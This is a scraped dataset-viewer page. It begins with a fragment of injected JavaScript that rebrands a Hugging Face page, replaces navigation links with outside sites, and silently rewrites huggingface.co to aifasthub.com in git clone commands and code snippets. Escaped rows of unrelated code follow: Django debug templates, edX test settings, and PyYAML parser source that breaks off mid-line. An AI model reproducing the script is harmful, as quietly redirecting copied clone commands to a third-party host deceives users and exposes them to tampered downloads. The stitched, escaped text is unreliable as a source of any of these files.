{ // 获取包含Hugging Face文本的span元素 const spans = link.querySelectorAll('span.whitespace-nowrap, span.hidden.whitespace-nowrap'); spans.forEach(span => { if (span.textContent && span.textContent.trim().match(/Hugging\s*Face/i)) { span.textContent = 'AI快站'; } }); }); // 替换logo图片的alt属性 document.querySelectorAll('img[alt*="Hugging"], img[alt*="Face"]').forEach(img => { if (img.alt.match(/Hugging\s*Face/i)) { img.alt = 'AI快站 logo'; } }); } // 替换导航栏中的链接 function replaceNavigationLinks() { // 已替换标记,防止重复运行 if (window._navLinksReplaced) { return; } // 已经替换过的链接集合,防止重复替换 const replacedLinks = new Set(); // 只在导航栏区域查找和替换链接 const headerArea = document.querySelector('header') || document.querySelector('nav'); if (!headerArea) { return; } // 在导航区域内查找链接 const navLinks = headerArea.querySelectorAll('a'); navLinks.forEach(link => { // 如果已经替换过,跳过 if (replacedLinks.has(link)) return; const linkText = link.textContent.trim(); const linkHref = link.getAttribute('href') || ''; // 替换Spaces链接 - 仅替换一次 if ( (linkHref.includes('/spaces') || linkHref === '/spaces' || linkText === 'Spaces' || linkText.match(/^s*Spacess*$/i)) && linkText !== 'PDF TO Markdown' && linkText !== 'PDF TO Markdown' ) { link.textContent = 'PDF TO Markdown'; link.href = 'https://fast360.xyz'; link.setAttribute('target', '_blank'); link.setAttribute('rel', 'noopener noreferrer'); replacedLinks.add(link); } // 删除Posts链接 else if ( (linkHref.includes('/posts') || linkHref === '/posts' || linkText === 'Posts' || linkText.match(/^s*Postss*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } // 替换Docs链接 - 仅替换一次 else if ( (linkHref.includes('/docs') || linkHref === '/docs' || linkText === 'Docs' || linkText.match(/^s*Docss*$/i)) && linkText !== 'Voice Cloning' ) { link.textContent = 'Voice Cloning'; link.href = 'https://vibevoice.info/'; replacedLinks.add(link); } // 删除Enterprise链接 else if ( (linkHref.includes('/enterprise') || linkHref === '/enterprise' || linkText === 'Enterprise' || linkText.match(/^s*Enterprises*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } }); // 查找可能嵌套的Spaces和Posts文本 const textNodes = []; function findTextNodes(element) { if (element.nodeType === Node.TEXT_NODE) { const text = element.textContent.trim(); if (text === 'Spaces' || text === 'Posts' || text === 'Enterprise') { textNodes.push(element); } } else { for (const child of element.childNodes) { findTextNodes(child); } } } // 只在导航区域内查找文本节点 findTextNodes(headerArea); // 替换找到的文本节点 textNodes.forEach(node => { const text = node.textContent.trim(); if (text === 'Spaces') { node.textContent = node.textContent.replace(/Spaces/g, 'PDF TO Markdown'); } else if (text === 'Posts') { // 删除Posts文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } else if (text === 'Enterprise') { // 删除Enterprise文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } }); // 标记已替换完成 window._navLinksReplaced = true; } // 替换代码区域中的域名 function replaceCodeDomains() { // 特别处理span.hljs-string和span.njs-string元素 document.querySelectorAll('span.hljs-string, span.njs-string, span[class*="hljs-string"], span[class*="njs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换hljs-string类的span中的域名(移除多余的转义符号) document.querySelectorAll('span.hljs-string, span[class*="hljs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换pre和code标签中包含git clone命令的域名 document.querySelectorAll('pre, code').forEach(element => { if (element.textContent && element.textContent.includes('git clone')) { const text = element.innerHTML; if (text.includes('huggingface.co')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 处理特定的命令行示例 document.querySelectorAll('pre, code').forEach(element => { const text = element.innerHTML; if (text.includes('huggingface.co')) { // 针对git clone命令的专门处理 if (text.includes('git clone') || text.includes('GIT_LFS_SKIP_SMUDGE=1')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 特别处理模型下载页面上的代码片段 document.querySelectorAll('.flex.border-t, .svelte_hydrator, .inline-block').forEach(container => { const content = container.innerHTML; if (content && content.includes('huggingface.co')) { container.innerHTML = content.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 特别处理模型仓库克隆对话框中的代码片段 try { // 查找包含"Clone this model repository"标题的对话框 const cloneDialog = document.querySelector('.svelte_hydration_boundary, [data-target="MainHeader"]'); if (cloneDialog) { // 查找对话框中所有的代码片段和命令示例 const codeElements = cloneDialog.querySelectorAll('pre, code, span'); codeElements.forEach(element => { if (element.textContent && element.textContent.includes('huggingface.co')) { if (element.innerHTML.includes('huggingface.co')) { element.innerHTML = element.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { element.textContent = element.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); } // 更精确地定位克隆命令中的域名 document.querySelectorAll('[data-target]').forEach(container => { const codeBlocks = container.querySelectorAll('pre, code, span.hljs-string'); codeBlocks.forEach(block => { if (block.textContent && block.textContent.includes('huggingface.co')) { if (block.innerHTML.includes('huggingface.co')) { block.innerHTML = block.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { block.textContent = block.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); }); } catch (e) { // 错误处理但不打印日志 } } // 当DOM加载完成后执行替换 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', () => { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); }); } else { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); } // 增加一个MutationObserver来处理可能的动态元素加载 const observer = new MutationObserver(mutations => { // 检查是否导航区域有变化 const hasNavChanges = mutations.some(mutation => { // 检查是否存在header或nav元素变化 return Array.from(mutation.addedNodes).some(node => { if (node.nodeType === Node.ELEMENT_NODE) { // 检查是否是导航元素或其子元素 if (node.tagName === 'HEADER' || node.tagName === 'NAV' || node.querySelector('header, nav')) { return true; } // 检查是否在导航元素内部 let parent = node.parentElement; while (parent) { if (parent.tagName === 'HEADER' || parent.tagName === 'NAV') { return true; } parent = parent.parentElement; } } return false; }); }); // 只在导航区域有变化时执行替换 if (hasNavChanges) { // 重置替换状态,允许再次替换 window._navLinksReplaced = false; replaceHeaderBranding(); replaceNavigationLinks(); } }); // 开始观察document.body的变化,包括子节点 if (document.body) { observer.observe(document.body, { childList: true, subtree: true }); } else { document.addEventListener('DOMContentLoaded', () => { observer.observe(document.body, { childList: true, subtree: true }); }); } })(); \n\n\"\"\")\n\nTECHNICAL_500_TEXT_TEMPLATE = (\"\"\"{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}\n{% firstof exception_value 'No exception message supplied' %}\n{% if request %}\nRequest Method: {{ request.META.REQUEST_METHOD }}\nRequest URL: {{ request.build_absolute_uri }}{% endif %}\nDjango Version: {{ django_version_info }}\nPython Executable: {{ sys_executable }}\nPython Version: {{ sys_version_info }}\nPython Path: {{ sys_path }}\nServer time: {{server_time|date:\"r\"}}\nInstalled Applications:\n{{ settings.INSTALLED_APPS|pprint }}\nInstalled Middleware:\n{{ settings.MIDDLEWARE_CLASSES|pprint }}\n{% if template_does_not_exist %}Template loader postmortem\n{% if postmortem %}Django tried loading these templates, in this order:\n{% for entry in postmortem %}\nUsing engine {{ entry.backend.name }}:\n{% if entry.tried %}{% for attempt in entry.tried %} * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})\n{% endfor %}{% else %} This engine did not provide a list of tried templates.\n{% endif %}{% endfor %}\n{% else %}No templates were found because your 'TEMPLATES' setting is not configured.\n{% endif %}\n{% endif %}{% if template_info %}\nTemplate error:\nIn template {{ template_info.name }}, error at line {{ template_info.line }}\n {{ template_info.message }}\n{% for source_line in template_info.source_lines %}\"\"\"\n\"{% ifequal source_line.0 template_info.line %}\"\n\" {{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}\"\n\"{% else %}\"\n\" {{ source_line.0 }} : {{ source_line.1 }}\"\n\"\"\"{% endifequal %}{% endfor %}{% endif %}{% if frames %}\n\nTraceback:\"\"\"\n\"{% for frame in frames %}\"\n\"{% ifchanged frame.exc_cause %}\"\n\" {% if frame.exc_cause %}\" \"\"\"\n {% if frame.exc_cause_explicit %}\n The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:\n {% else %}\n During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:\n {% endif %}\n {% endif %}\n{% endifchanged %}\nFile \"{{ frame.filename }}\" in {{ frame.function }}\n{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}\n{% endfor %}\n{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}\n{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}\n{% if request %}Request information:\nGET:{% for k, v in request.GET.items %}\n{{ k }} = {{ v|stringformat:\"r\" }}{% empty %} No GET data{% endfor %}\n\nPOST:{% for k, v in filtered_POST.items %}\n{{ k }} = {{ v|stringformat:\"r\" }}{% empty %} No POST data{% endfor %}\n\nFILES:{% for k, v in request.FILES.items %}\n{{ k }} = {{ v|stringformat:\"r\" }}{% empty %} No FILES data{% endfor %}\n\nCOOKIES:{% for k, v in request.COOKIES.items %}\n{{ k }} = {{ v|stringformat:\"r\" }}{% empty %} No cookie data{% endfor %}\n\nMETA:{% for k, v in request.META.items|dictsort:\"0\" %}\n{{ k }} = {{ v|stringformat:\"r\" }}{% endfor %}\n{% else %}Request data not supplied\n{% endif %}\nSettings:\nUsing settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:\"0\" %}\n{{ k }} = {{ v|stringformat:\"r\" }}{% endfor %}\n\n{% if not is_email %}\nYou're seeing this error because you have DEBUG = True in your\nDjango settings file. Change that to False, and Django will\ndisplay a standard page generated by the handler for this status code.\n{% endif %}\n\"\"\")\n\nTECHNICAL_404_TEMPLATE = \"\"\"\n\n\n\n \n Page not found at {{ request.path_info|escape }}\n \n \n\n\n
\n

Page not found (404)

\n \n \n \n \n \n \n \n \n \n {% if raising_view_name %}\n \n \n \n \n {% endif %}\n
Request Method:{{ request.META.REQUEST_METHOD }}
Request URL:{{ request.build_absolute_uri|escape }}
Raised by:{{ raising_view_name }}
\n
\n
\n {% if urlpatterns %}\n

\n Using the URLconf defined in {{ urlconf }},\n Django tried these URL patterns, in this order:\n

\n
    \n {% for pattern in urlpatterns %}\n
  1. \n {% for pat in pattern %}\n {{ pat.regex.pattern }}\n {% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}\n {% endfor %}\n
  2. \n {% endfor %}\n
\n

The current URL, {{ request_path|escape }}, didn't match any of these.

\n {% else %}\n

{{ reason }}

\n {% endif %}\n
\n\n
\n

\n You're seeing this error because you have DEBUG = True in\n your Django settings file. Change that to False, and Django\n will display a standard 404 page.\n

\n
\n\n\n\"\"\"\n\nDEFAULT_URLCONF_TEMPLATE = \"\"\"\n\n\n \n {{ title }}\n \n\n\n\n
\n

{{ heading }}

\n

{{ subheading }}

\n
\n\n
\n

\n {{ instructions|safe }}\n

\n
\n\n
\n

\n {{ explanation|safe }}\n

\n
\n\n\"\"\"\n"},"license":{"kind":"string","value":"bsd-3-clause"}}},{"rowIdx":2419,"cells":{"repo_name":{"kind":"string","value":"SivilTaram/edx-platform"},"path":{"kind":"string","value":"lms/envs/cms/microsite_test.py"},"copies":{"kind":"string","value":"110"},"size":{"kind":"string","value":"1675"},"content":{"kind":"string","value":"\"\"\"\nThis is a localdev test for the Microsite processing pipeline\n\"\"\"\n# We intentionally define lots of variables that aren't used, and\n# want to import all variables from base settings files\n# pylint: disable=wildcard-import, unused-wildcard-import\n\n# Pylint gets confused by path.py instances, which report themselves as class\n# objects. As a result, pylint applies the wrong regex in validating names,\n# and throws spurious errors. Therefore, we disable invalid-name checking.\n# pylint: disable=invalid-name\n\nfrom .dev import *\nfrom ..dev import ENV_ROOT, FEATURES\n\n\nMICROSITE_CONFIGURATION = {\n \"openedx\": {\n \"domain_prefix\": \"openedx\",\n \"university\": \"openedx\",\n \"platform_name\": \"Open edX\",\n \"logo_image_url\": \"openedx/images/header-logo.png\",\n \"email_from_address\": \"openedx@edx.org\",\n \"payment_support_email\": \"openedx@edx.org\",\n \"ENABLE_MKTG_SITE\": False,\n \"SITE_NAME\": \"openedx.localhost\",\n \"course_org_filter\": \"CDX\",\n \"course_about_show_social_links\": False,\n \"css_overrides_file\": \"openedx/css/openedx.css\",\n \"show_partners\": False,\n \"show_homepage_promo_video\": False,\n \"course_index_overlay_text\": \"Explore free courses from leading universities.\",\n \"course_index_overlay_logo_file\": \"openedx/images/header-logo.png\",\n \"homepage_overlay_html\": \"

Take an Open edX Course

\"\n }\n}\n\nMICROSITE_ROOT_DIR = ENV_ROOT / 'edx-microsite'\n\n# pretend we are behind some marketing site, we want to be able to assert that the Microsite config values override\n# this global setting\nFEATURES['ENABLE_MKTG_SITE'] = True\nFEATURES['USE_MICROSITES'] = True\n"},"license":{"kind":"string","value":"agpl-3.0"}}},{"rowIdx":2420,"cells":{"repo_name":{"kind":"string","value":"sjsucohort6/openstack"},"path":{"kind":"string","value":"python/venv/lib/python2.7/site-packages/yaml/parser.py"},"copies":{"kind":"string","value":"409"},"size":{"kind":"string","value":"25542"},"content":{"kind":"string","value":"\n# The following YAML grammar is LL(1) and is parsed by a recursive descent\n# parser.\n#\n# stream ::= STREAM-START implicit_document? explicit_document* STREAM-END\n# implicit_document ::= block_node DOCUMENT-END*\n# explicit_document ::= DIRECTIVE* DOCUMENT-START block_node? DOCUMENT-END*\n# block_node_or_indentless_sequence ::=\n# ALIAS\n# | properties (block_content | indentless_block_sequence)?\n# | block_content\n# | indentless_block_sequence\n# block_node ::= ALIAS\n# | properties block_content?\n# | block_content\n# flow_node ::= ALIAS\n# | properties flow_content?\n# | flow_content\n# properties ::= TAG ANCHOR? | ANCHOR TAG?\n# block_content ::= block_collection | flow_collection | SCALAR\n# flow_content ::= flow_collection | SCALAR\n# block_collection ::= block_sequence | block_mapping\n# flow_collection ::= flow_sequence | flow_mapping\n# block_sequence ::= BLOCK-SEQUENCE-START (BLOCK-ENTRY block_node?)* BLOCK-END\n# indentless_sequence ::= (BLOCK-ENTRY block_node?)+\n# block_mapping ::= BLOCK-MAPPING_START\n# ((KEY block_node_or_indentless_sequence?)?\n# (VALUE block_node_or_indentless_sequence?)?)*\n# BLOCK-END\n# flow_sequence ::= FLOW-SEQUENCE-START\n# (flow_sequence_entry FLOW-ENTRY)*\n# flow_sequence_entry?\n# FLOW-SEQUENCE-END\n# flow_sequence_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?\n# flow_mapping ::= FLOW-MAPPING-START\n# (flow_mapping_entry FLOW-ENTRY)*\n# flow_mapping_entry?\n# FLOW-MAPPING-END\n# flow_mapping_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?\n#\n# FIRST sets:\n#\n# stream: { STREAM-START }\n# explicit_document: { DIRECTIVE DOCUMENT-START }\n# implicit_document: FIRST(block_node)\n# block_node: { ALIAS TAG ANCHOR SCALAR BLOCK-SEQUENCE-START BLOCK-MAPPING-START FLOW-SEQUENCE-START FLOW-MAPPING-START }\n# flow_node: { ALIAS ANCHOR TAG SCALAR FLOW-SEQUENCE-START FLOW-MAPPING-START }\n# block_content: { BLOCK-SEQUENCE-START BLOCK-MAPPING-START FLOW-SEQUENCE-START FLOW-MAPPING-START SCALAR }\n# flow_content: { FLOW-SEQUENCE-START FLOW-MAPPING-START SCALAR }\n# block_collection: { BLOCK-SEQUENCE-START BLOCK-MAPPING-START }\n# flow_collection: { FLOW-SEQUENCE-START FLOW-MAPPING-START }\n# block_sequence: { BLOCK-SEQUENCE-START }\n# block_mapping: { BLOCK-MAPPING-START }\n# block_node_or_indentless_sequence: { ALIAS ANCHOR TAG SCALAR BLOCK-SEQUENCE-START BLOCK-MAPPING-START FLOW-SEQUENCE-START FLOW-MAPPING-START BLOCK-ENTRY }\n# indentless_sequence: { ENTRY }\n# flow_collection: { FLOW-SEQUENCE-START FLOW-MAPPING-START }\n# flow_sequence: { FLOW-SEQUENCE-START }\n# flow_mapping: { FLOW-MAPPING-START }\n# flow_sequence_entry: { ALIAS ANCHOR TAG SCALAR FLOW-SEQUENCE-START FLOW-MAPPING-START KEY }\n# flow_mapping_entry: { ALIAS ANCHOR TAG SCALAR FLOW-SEQUENCE-START FLOW-MAPPING-START KEY }\n\n__all__ = ['Parser', 'ParserError']\n\nfrom error import MarkedYAMLError\nfrom tokens import *\nfrom events import *\nfrom scanner import *\n\nclass ParserError(MarkedYAMLError):\n pass\n\nclass Parser(object):\n # Since writing a recursive-descendant parser is a straightforward task, we\n # do not give many comments here.\n\n DEFAULT_TAGS = {\n u'!': u'!',\n u'!!': u'tag:yaml.org,2002:',\n }\n\n def __init__(self):\n self.current_event = None\n self.yaml_version = None\n self.tag_handles = {}\n self.states = []\n self.marks = []\n self.state = self.parse_stream_start\n\n def dispose(self):\n # Reset the state attributes (to clear self-references)\n self.states = []\n self.state = None\n\n def check_event(self, *choices):\n # Check the type of the next event.\n if self.current_event is None:\n if self.state:\n self.current_event = self.state()\n if self.current_event is not None:\n if not choices:\n return True\n for choice in choices:\n if isinstance(self.current_event, choice):\n return True\n return False\n\n def peek_event(self):\n # Get the next event.\n if self.current_event is None:\n if self.state:\n self.current_event = self.state()\n return self.current_event\n\n def get_event(self):\n # Get the next event and proceed further.\n if self.current_event is None:\n if self.state:\n self.current_event = self.state()\n value = self.current_event\n self.current_event = None\n return value\n\n # stream ::= STREAM-START implicit_document? explicit_document* STREAM-END\n # implicit_document ::= block_node DOCUMENT-END*\n # explicit_document ::= DIRECTIVE* DOCUMENT-START block_node? DOCUMENT-END*\n\n def parse_stream_start(self):\n\n # Parse the stream start.\n token = self.get_token()\n event = StreamStartEvent(token.start_mark, token.end_mark,\n encoding=token.encoding)\n\n # Prepare the next state.\n self.state = self.parse_implicit_document_start\n\n return event\n\n def parse_implicit_document_start(self):\n\n # Parse an implicit document.\n if not self.check_token(DirectiveToken, DocumentStartToken,\n StreamEndToken):\n self.tag_handles = self.DEFAULT_TAGS\n token = self.peek_token()\n start_mark = end_mark = token.start_mark\n event = DocumentStartEvent(start_mark, end_mark,\n explicit=False)\n\n # Prepare the next state.\n self.states.append(self.parse_document_end)\n self.state = self.parse_block_node\n\n return event\n\n else:\n return self.parse_document_start()\n\n def parse_document_start(self):\n\n # Parse any extra document end indicators.\n while self.check_token(DocumentEndToken):\n self.get_token()\n\n # Parse an explicit document.\n if not self.check_token(StreamEndToken):\n token = self.peek_token()\n start_mark = token.start_mark\n version, tags = self.process_directives()\n if not self.check_token(DocumentStartToken):\n raise ParserError(None, None,\n \"expected '', but found %r\"\n % self.peek_token().id,\n self.peek_token().start_mark)\n token = self.get_token()\n end_mark = token.end_mark\n event = DocumentStartEvent(start_mark, end_mark,\n explicit=True, version=version, tags=tags)\n self.states.append(self.parse_document_end)\n self.state = self.parse_document_content\n else:\n # Parse the end of the stream.\n token = self.get_token()\n event = StreamEndEvent(token.start_mark, token.end_mark)\n assert not self.states\n assert not self.marks\n self.state = None\n return event\n\n def parse_document_end(self):\n\n # Parse the document end.\n token = self.peek_token()\n start_mark = end_mark = token.start_mark\n explicit = False\n if self.check_token(DocumentEndToken):\n token = self.get_token()\n end_mark = token.end_mark\n explicit = True\n event = DocumentEndEvent(start_mark, end_mark,\n explicit=explicit)\n\n # Prepare the next state.\n self.state = self.parse_document_start\n\n return event\n\n def parse_document_content(self):\n if self.check_token(DirectiveToken,\n DocumentStartToken, DocumentEndToken, StreamEndToken):\n event = self.process_empty_scalar(self.peek_token().start_mark)\n self.state = self.states.pop()\n return event\n else:\n return self.parse_block_node()\n\n def process_directives(self):\n self.yaml_version = None\n self.tag_handles = {}\n while self.check_token(DirectiveToken):\n token = self.get_token()\n if token.name == u'YAML':\n if self.yaml_version is not None:\n raise ParserError(None, None,\n \"found duplicate YAML directive\", token.start_mark)\n major, minor = token.value\n if major != 1:\n raise ParserError(None, None,\n \"found incompatible YAML document (version 1.* is required)\",\n token.start_mark)\n self.yaml_version = token.value\n elif token.name == u'TAG':\n handle, prefix = token.value\n if handle in self.tag_handles:\n raise ParserError(None, None,\n \"duplicate tag handle %r\" % handle.encode('utf-8'),\n token.start_mark)\n self.tag_handles[handle] = prefix\n if self.tag_handles:\n value = self.yaml_version, self.tag_handles.copy()\n else:\n value = self.yaml_version, None\n for key in self.DEFAULT_TAGS:\n if key not in self.tag_handles:\n self.tag_handles[key] = self.DEFAULT_TAGS[key]\n return value\n\n # block_node_or_indentless_sequence ::= ALIAS\n # | properties (block_content | indentless_block_sequence)?\n # | block_content\n # | indentless_block_sequence\n # block_node ::= ALIAS\n # | properties block_content?\n # | block_content\n # flow_node ::= ALIAS\n # | properties flow_content?\n # | flow_content\n # properties ::= TAG ANCHOR? | ANCHOR TAG?\n # block_content ::= block_collection | flow_collection | SCALAR\n # flow_content ::= flow_collection | SCALAR\n # block_collection ::= block_sequence | block_mapping\n # flow_collection ::= flow_sequence | flow_mapping\n\n def parse_block_node(self):\n return self.parse_node(block=True)\n\n def parse_flow_node(self):\n return self.parse_node()\n\n def parse_block_node_or_indentless_sequence(self):\n return self.parse_node(block=True, indentless_sequence=True)\n\n def parse_node(self, block=False, indentless_sequence=False):\n if self.check_token(AliasToken):\n token = self.get_token()\n event = AliasEvent(token.value, token.start_mark, token.end_mark)\n self.state = self.states.pop()\n else:\n anchor = None\n tag = None\n start_mark = end_mark = tag_mark = None\n if self.check_token(AnchorToken):\n token = self.get_token()\n start_mark = token.start_mark\n end_mark = token.end_mark\n anchor = token.value\n if self.check_token(TagToken):\n token = self.get_token()\n tag_mark = token.start_mark\n end_mark = token.end_mark\n tag = token.value\n elif self.check_token(TagToken):\n token = self.get_token()\n start_mark = tag_mark = token.start_mark\n end_mark = token.end_mark\n tag = token.value\n if self.check_token(AnchorToken):\n token = self.get_token()\n end_mark = token.end_mark\n anchor = token.value\n if tag is not None:\n handle, suffix = tag\n if handle is not None:\n if handle not in self.tag_handles:\n raise ParserError(\"while parsing a node\", start_mark,\n \"found undefined tag handle %r\" % handle.encode('utf-8'),\n tag_mark)\n tag = self.tag_handles[handle]+suffix\n else:\n tag = suffix\n #if tag == u'!':\n # raise ParserError(\"while parsing a node\", start_mark,\n # \"found non-specific tag '!'\", tag_mark,\n # \"Please check 'http://pyyaml.org/wiki/YAMLNonSpecificTag' and share your opinion.\")\n if start_mark is None:\n start_mark = end_mark = self.peek_token().start_mark\n event = None\n implicit = (tag is None or tag == u'!')\n if indentless_sequence and self.check_token(BlockEntryToken):\n end_mark = self.peek_token().end_mark\n event = SequenceStartEvent(anchor, tag, implicit,\n start_mark, end_mark)\n self.state = self.parse_indentless_sequence_entry\n else:\n if self.check_token(ScalarToken):\n token = self.get_token()\n end_mark = token.end_mark\n if (token.plain and tag is None) or tag == u'!':\n implicit = (True, False)\n elif tag is None:\n implicit = (False, True)\n else:\n implicit = (False, False)\n event = ScalarEvent(anchor, tag, implicit, token.value,\n start_mark, end_mark, style=token.style)\n self.state = self.states.pop()\n elif self.check_token(FlowSequenceStartToken):\n end_mark = self.peek_token().end_mark\n event = SequenceStartEvent(anchor, tag, implicit,\n start_mark, end_mark, flow_style=True)\n self.state = self.parse_flow_sequence_first_entry\n elif self.check_token(FlowMappingStartToken):\n end_mark = self.peek_token().end_mark\n event = MappingStartEvent(anchor, tag, implicit,\n start_mark, end_mark, flow_style=True)\n self.state = self.parse_flow_mapping_first_key\n elif block and self.check_token(BlockSequenceStartToken):\n end_mark = self.peek_token().start_mark\n event = SequenceStartEvent(anchor, tag, implicit,\n start_mark, end_mark, flow_style=False)\n self.state = self.parse_block_sequence_first_entry\n elif block and self.check_token(BlockMappingStartToken):\n end_mark = self.peek_token().start_mark\n event = MappingStartEvent(anchor, tag, implicit,\n start_mark, end_mark, flow_style=False)\n self.state = self.parse_block_mapping_first_key\n elif anchor is not None or tag is not None:\n # Empty scalars are allowed even if a tag or an anchor is\n # specified.\n event = ScalarEvent(anchor, tag, (implicit, False), u'',\n start_mark, end_mark)\n self.state = self.states.pop()\n else:\n if block:\n node = 'block'\n else:\n node = 'flow'\n token = self.peek_token()\n raise ParserError(\"while parsing a %s node\" % node, start_mark,\n \"expected the node content, but found %r\" % token.id,\n token.start_mark)\n return event\n\n # block_sequence ::= BLOCK-SEQUENCE-START (BLOCK-ENTRY block_node?)* BLOCK-END\n\n def parse_block_sequence_first_entry(self):\n token = self.get_token()\n self.marks.append(token.start_mark)\n return self.parse_block_sequence_entry()\n\n def parse_block_sequence_entry(self):\n if self.check_token(BlockEntryToken):\n token = self.get_token()\n if not self.check_token(BlockEntryToken, BlockEndToken):\n self.states.append(self.parse_block_sequence_entry)\n return self.parse_block_node()\n else:\n self.state = self.parse_block_sequence_entry\n return self.process_empty_scalar(token.end_mark)\n if not self.check_token(BlockEndToken):\n token = self.peek_token()\n raise ParserError(\"while parsing a block collection\", self.marks[-1],\n \"expected , but found %r\" % token.id, token.start_mark)\n token = self.get_token()\n event = SequenceEndEvent(token.start_mark, token.end_mark)\n self.state = self.states.pop()\n self.marks.pop()\n return event\n\n # indentless_sequence ::= (BLOCK-ENTRY block_node?)+\n\n def parse_indentless_sequence_entry(self):\n if self.check_token(BlockEntryToken):\n token = self.get_token()\n if not self.check_token(BlockEntryToken,\n KeyToken, ValueToken, BlockEndToken):\n self.states.append(self.parse_indentless_sequence_entry)\n return self.parse_block_node()\n else:\n self.state = self.parse_indentless_sequence_entry\n return self.process_empty_scalar(token.end_mark)\n token = self.peek_token()\n event = SequenceEndEvent(token.start_mark, token.start_mark)\n self.state = self.states.pop()\n return event\n\n # block_mapping ::= BLOCK-MAPPING_START\n # ((KEY block_node_or_indentless_sequence?)?\n # (VALUE block_node_or_indentless_sequence?)?)*\n # BLOCK-END\n\n def parse_block_mapping_first_key(self):\n token = self.get_token()\n self.marks.append(token.start_mark)\n return self.parse_block_mapping_key()\n\n def parse_block_mapping_key(self):\n if self.check_token(KeyToken):\n token = self.get_token()\n if not self.check_token(KeyToken, ValueToken, BlockEndToken):\n self.states.append(self.parse_block_mapping_value)\n return self.parse_block_node_or_indentless_sequence()\n else:\n self.state = self.parse_block_mapping_value\n return self.process_empty_scalar(token.end_mark)\n if not self.check_token(BlockEndToken):\n token = self.peek_token()\n raise ParserError(\"while parsing a block mapping\", self.marks[-1],\n \"expected , but found %r\" % token.id, token.start_mark)\n token = self.get_token()\n event = MappingEndEvent(token.start_mark, token.end_mark)\n self.state = self.states.pop()\n self.marks.pop()\n return event\n\n def parse_block_mapping_value(self):\n if self.check_token(ValueToken):\n token = self.get_token()\n if not self.check_token(KeyToken, ValueToken, BlockEndToken):\n self.states.append(self.parse_block_mapping_key)\n return self.parse_block_node_or_indentless_sequence()\n else:\n self.state = self.parse_block_mapping_key\n return self.process_empty_scalar(token.end_mark)\n else:\n self.state = self.parse_block_mapping_key\n token = self.peek_token()\n return self.process_empty_scalar(token.start_mark)\n\n # flow_sequence ::= FLOW-SEQUENCE-START\n # (flow_sequence_entry FLOW-ENTRY)*\n # flow_sequence_entry?\n # FLOW-SEQUENCE-END\n # flow_sequence_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?\n #\n # Note that while production rules for both flow_sequence_entry and\n # flow_mapping_entry are equal, their interpretations are different.\n # For `flow_sequence_entry`, the part `KEY flow_node? (VALUE flow_node?)?`\n # generate an inline mapping (set syntax).\n\n def parse_flow_sequence_first_entry(self):\n token = self.get_token()\n self.marks.append(token.start_mark)\n return self.parse_flow_sequence_entry(first=True)\n\n def parse_flow_sequence_entry(self, first=False):\n if not self.check_token(FlowSequenceEndToken):\n if not first:\n if self.check_token(FlowEntryToken):\n self.get_token()\n else:\n token = self.peek_token()\n raise ParserError(\"while parsing a flow sequence\", self.marks[-1],\n \"expected ',' or ']', but got %r\" % token.id, token.start_mark)\n \n if self.check_token(KeyToken):\n token = self.peek_token()\n event = MappingStartEvent(None, None, True,\n token.start_mark, token.end_mark,\n flow_style=True)\n self.state = self.parse_flow_sequence_entry_mapping_key\n return event\n elif not self.check_token(FlowSequenceEndToken):\n self.states.append(self.parse_flow_sequence_entry)\n return self.parse_flow_node()\n token = self.get_token()\n event = SequenceEndEvent(token.start_mark, token.end_mark)\n self.state = self.states.pop()\n self.marks.pop()\n return event\n\n def parse_flow_sequence_entry_mapping_key(self):\n token = self.get_token()\n if not self.check_token(ValueToken,\n FlowEntryToken, FlowSequenceEndToken):\n self.states.append(self.parse_flow_sequence_entry_mapping_value)\n return self.parse_flow_node()\n else:\n self.state = self.parse_flow_sequence_entry_mapping_value\n return self.process_empty_scalar(token.end_mark)\n\n def parse_flow_sequence_entry_mapping_value(self):\n if self.check_token(ValueToken):\n token = self.get_token()\n if not self.check_token(FlowEntryToken, FlowSequenceEndToken):\n self.states.append(self.parse_flow_sequence_entry_mapping_end)\n return self.parse_flow_node()\n else:\n self.state = self.parse_flow_sequence_entry_mapping_end\n return self.process_empty_scalar(token.end_mark)\n else:\n self.state = self.parse_flow_sequence_entry_mapping_end\n token = self.peek_token()\n return self.process_empty_scalar(token.start_mark)\n\n def parse_flow_sequence_entry_mapping_end(self):\n self.state = 